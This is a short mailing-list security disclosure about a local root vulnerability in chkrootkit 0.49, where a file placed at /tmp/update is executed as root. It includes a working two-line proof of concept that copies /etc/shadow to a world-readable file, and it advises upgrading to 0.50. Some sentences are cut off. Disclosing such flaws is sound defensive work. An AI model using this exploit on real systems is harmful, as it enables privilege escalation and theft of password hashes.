[Slackbuilds-users] chkrootkit vulnerability
mancha1 at hush.com
Thu Jun 5 06:27:35 UTC 2014
As ironic as it sounds, chkrootkit 0.49 can be turned into a
On systems where /tmp is not mounted noexec, a regular user can
file /tmp/update which chkrootkit will execute with root privileges
time it's run.
Here's a simple PoC...as normal user:
$ echo -e '#!/bin/bash\ncat /etc/shadow > /tmp/stolen' > /tmp/update
$ chmod 755 /tmp/update
Now the user has access to the shadow password file (/tmp/stolen).
Solution: Update to chkrootkit 0.50
[56B7 100E F4D5 811C 8FEF ADD1 2516 8EB2 4F0B 22AC]
More information about the SlackBuilds-users